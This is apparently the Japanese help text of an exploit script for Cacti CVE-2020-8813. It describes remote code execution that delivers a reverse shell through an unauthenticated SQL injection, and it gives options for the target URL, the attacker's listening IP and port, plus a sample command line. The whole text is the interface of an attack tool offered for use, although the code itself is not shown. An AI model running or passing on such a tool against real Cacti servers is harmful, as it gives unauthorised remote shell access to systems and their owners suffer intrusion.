
Cacti CVE-2020-8813 向けのリモートコード実行エクスプロイトで、リバースシェルペイロードを配信します。認証不要のSQLインジェクションを利用して、脆弱なCactiインストールにRCEを実行します。
使い方: cacti_rce.py [オプション]
オプション:
-h, --help このヘルプメッセージを表示して終了
-u URL, --url=URL [必須] ターゲットURL 例: http://Cacti/
-l LHOST, --lhost=LHOST
[必須] 攻撃者のIPアドレス
-p LPORT, --lport=LPORT
[デフォルト 443] 攻撃者のIPポート
python3 cacti_rce.py -u http://CACTI/ -l 192.168.x.x